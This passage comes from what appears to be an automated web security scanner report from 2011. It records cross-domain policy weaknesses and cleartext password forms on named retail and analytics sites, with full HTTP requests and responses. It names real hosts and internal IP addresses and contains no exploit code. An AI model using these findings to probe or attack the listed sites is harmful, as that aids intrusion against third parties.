   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

6.79. http://www.ftd.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ftd.com

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: TLTSID=4859AF2A7F5F107F0010D25B2EEAFAE4; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=4859AF2A7F5F107F0010D25B2EEAFAE4; Path=/; Domain=.ftd.com; expires=Mon, 16-05-2021 01:53:23 GMT
Vary: Accept-Encoding
Last-Modified: Wed, 13 Apr 2011 04:16:29 GMT
ETag: "fb-4da5239d"
Content-Type: text/xml
Content-Length: 251
Date: Mon, 16 May 2011 01:53:23 GMT
X-Varnish: 747078534
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ftd.com" />
<allow-access-from domain="*.ftdimg.com" />
...[SNIP]...

6.80. http://www.gnc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gnc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gnc.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:57:16 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 14 Oct 2010 08:47:00 GMT
ETag: "6781c1-195-4928fc0d4e900"
Accept-Ranges: bytes
Content-Length: 405
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 01:57:16 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="gnc.com" />
<allow-access-from domain="gnc.imageg.net" />
<allow-access-from domain="*.gspt.net" />
<allow-access-from domain="*.gsipartners.com" />
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...

6.81. https://www.gnc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.gnc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gnc.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:14:13 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 14 Oct 2010 08:47:00 GMT
ETag: "6781c1-195-4928fc0d4e900"
Accept-Ranges: bytes
Content-Length: 405
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 02:14:13 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="gnc.com" />
<allow-access-from domain="gnc.imageg.net" />
<allow-access-from domain="*.gspt.net" />
<allow-access-from domain="*.gsipartners.com" />
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...

6.82. http://www.homedepot.ca/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.homedepot.ca
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.homedepot.ca

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 31 Jan 2011 07:35:36 GMT
Content-Type: text/xml
Date: Mon, 16 May 2011 01:53:26 GMT
Content-Length: 339
Connection: close
Cache-Control: max-age=315360000
Expires: Mon, 10 May 2021 10:46:15 GMT

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*.homedepot.ca" />    <allow-access-from domain="*.startaconversation.com" />
   <allow-access-from domain="*.brightcove.com" />
...[SNIP]...

6.83. http://www.petsmart.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.petsmart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.petsmart.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:01 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 08 May 2008 01:49:36 GMT
ETag: "53c78d-30d-44cae4b2b6c00"
Accept-Ranges: bytes
Content-Length: 781
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 01:53:01 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.petsmart.com" secu
...[SNIP]...
<allow-access-from domain="*.petsmart.com" secure="true" />
...[SNIP]...
<allow-access-from domain="pet.imageg.net" />
<allow-access-from domain="*.gspt.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.gsipartners.com" secure="true" />
...[SNIP]...
<allow-access-from domain="172.20.1.172" />
<allow-access-from domain="172.21.1.172" />
<allow-access-from domain="206.16.220.172" />
<allow-access-from domain="63.240.110.172" />
<allow-access-from domain="preview.gsipartners.com" secure="true" />
...[SNIP]...

6.84. https://www.petsmart.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.petsmart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.petsmart.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:17:47 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 08 May 2008 01:49:36 GMT
ETag: "53c78d-30d-44cae4b2b6c00"
Accept-Ranges: bytes
Content-Length: 781
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 10:17:47 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.petsmart.com" secu
...[SNIP]...
<allow-access-from domain="*.petsmart.com" secure="true" />
...[SNIP]...
<allow-access-from domain="pet.imageg.net" />
<allow-access-from domain="*.gspt.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.gsipartners.com" secure="true" />
...[SNIP]...
<allow-access-from domain="172.20.1.172" />
<allow-access-from domain="172.21.1.172" />
<allow-access-from domain="206.16.220.172" />
<allow-access-from domain="63.240.110.172" />
<allow-access-from domain="preview.gsipartners.com" secure="true" />
...[SNIP]...

6.85. http://www.res-x.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.res-x.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.res-x.com

Response

HTTP/1.1 200 OK
Content-Length: 217
Content-Type: text/xml
Last-Modified: Fri, 22 Jan 2010 01:35:21 GMT
Accept-Ranges: bytes
ETag: "fe71562939bca1:bde"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:53:45 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.warnerbros.com"/>
</cross
...[SNIP]...

6.86. http://www.helzberg.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.helzberg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.helzberg.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 09 May 2011 16:45:32 GMT
ETag: "1fa-9159e300"
Accept-Ranges: bytes
Content-Length: 506
Content-Type: application/xml
Cache-Control: max-age=7200
Date: Mon, 16 May 2011 01:53:54 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="testvip1.scene7.com" />
<allow-access-from domain="s7ondemand1.scene7.com" />
<allow-access-from domain="testvipd2.scene7.com" />
<allow-access-from domain="s7d2.scene7.com" />
<allow-access-from domain="origin-apps3.scene7.com" />
<allow-access-from domain="s7demo.scene7.com" />
...[SNIP]...

6.87. https://www.helzberg.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.helzberg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.helzberg.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 09 May 2011 16:45:32 GMT
ETag: "1fa-9159e300"
Content-Type: application/xml
Cache-Control: max-age=7200
Date: Mon, 16 May 2011 10:45:12 GMT
Content-Length: 506
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="testvip1.scene7.com" />
<allow-access-from domain="s7ondemand1.scene7.com" />
<allow-access-from domain="testvipd2.scene7.com" />
<allow-access-from domain="s7d2.scene7.com" />
<allow-access-from domain="origin-apps3.scene7.com" />
<allow-access-from domain="s7demo.scene7.com" />
...[SNIP]...

7. Silverlight cross-domain policy
There are 15 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged-in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


7.1. http://ad.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Mon, 16 May 2011 01:53:56 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Tue, 17 May 2011 01:55:23 GMT
Date: Mon, 16 May 2011 01:55:23 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.3. http://cebwa.122.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cebwa.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: cebwa.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:08 GMT
Server: Omniture DC/2.0.0
xserver: www80
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.4. http://gsicace.112.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsicace.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: gsicace.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:57:12 GMT
Server: Omniture DC/2.0.0
xserver: www388
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.5. http://marketlive.122.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://marketlive.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: marketlive.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:42 GMT
Server: Omniture DC/2.0.0
xserver: www438
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.6. http://metrics.brookstone.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.brookstone.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.brookstone.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:56 GMT
Server: Omniture DC/2.0.0
xserver: www321
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.7. http://metrics.ftd.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.ftd.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.ftd.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:38 GMT
Server: Omniture DC/2.0.0
xserver: www268
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.8. http://metrics.gnc.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.gnc.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.gnc.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:44 GMT
Server: Omniture DC/2.0.0
xserver: www344
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.9. http://metrics.mcafee.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.mcafee.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.mcafee.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:06:39 GMT
Server: Omniture DC/2.0.0
xserver: www76
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.10. http://metrics.pacsun.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.pacsun.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.pacsun.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:28 GMT
Server: Omniture DC/2.0.0
xserver: www30
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.11. http://metrics.petsmart.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.petsmart.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.petsmart.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:15 GMT
Server: Omniture DC/2.0.0
xserver: www637
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.12. http://mlarmani.122.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlarmani.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: mlarmani.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:02 GMT
Server: Omniture DC/2.0.0
xserver: www9
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.13. http://o.toshibadirect.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://o.toshibadirect.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: o.toshibadirect.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:56:41 GMT
Server: Omniture DC/2.0.0
xserver: www285
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.14. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:14 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Mon, 23 May 2011 02:00:14 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

7.15. http://wasc.homedepot.ca/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://wasc.homedepot.ca
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: wasc.homedepot.ca

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:11 GMT
Server: Omniture DC/2.0.0
xserver: www15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

8. Cleartext submission of password
There are 5 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


8.1. http://shoprunner.force.com/content/JsContentElementsGNC

Summary

Severity:   High
Confidence:   Certain
Host:   http://shoprunner.force.com
Path:   /content/JsContentElementsGNC

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /content/JsContentElementsGNC HTTP/1.1
Host: shoprunner.force.com
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/community/index.jsp%20%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-Modified-Since: Mon, 16 May 2011 01:05:43 GMT

Response

HTTP/1.1 200 OK
Server:
X-Powered-By: Salesforce.com ApexPages
P3P: CP="CUR OTR STA"
Last-Modified: Mon, 16 May 2011 06:29:18 GMT
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: public, max-age=8008
Expires: Mon, 16 May 2011 12:29:56 GMT
Date: Mon, 16 May 2011 10:16:28 GMT
Connection: close
Content-Length: 108383


function sr_run(){
return false
}

/* -----------------------------------------
* Global Variables
----------------------------------------- */
//the shoprunner object
var sr_$={};
sr_$.contents={}
...[SNIP]...
</div>';

//learn step 1
var s1_form='<form action="step1" id="sr_lrn1F" name="sr_step1" onsubmit="if(sr_$.actions.validate.form(\'sr_lrn1F\')){sr_$.actions.learnStep(2);}return false;"><h4 class="sr_htag">
...[SNIP]...
</label><input class="sr_vpassword" name="password2" tabindex="1" type="password"></li>
...[SNIP]...

8.2. http://shoprunner.force.com/content/JsContentElementsPET

Summary

Severity:   High
Confidence:   Certain
Host:   http://shoprunner.force.com
Path:   /content/JsContentElementsPET

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /content/JsContentElementsPET HTTP/1.1
Host: shoprunner.force.com
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-Modified-Since: Mon, 16 May 2011 01:05:40 GMT

Response

HTTP/1.1 200 OK
Server:
X-Powered-By: Salesforce.com ApexPages
P3P: CP="CUR OTR STA"
Last-Modified: Mon, 16 May 2011 06:29:45 GMT
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: public, max-age=7868
Expires: Mon, 16 May 2011 12:29:04 GMT
Date: Mon, 16 May 2011 10:17:56 GMT
Connection: close
Content-Length: 106125


function sr_run(){
return false
}

/* -----------------------------------------
* Global Variables
----------------------------------------- */
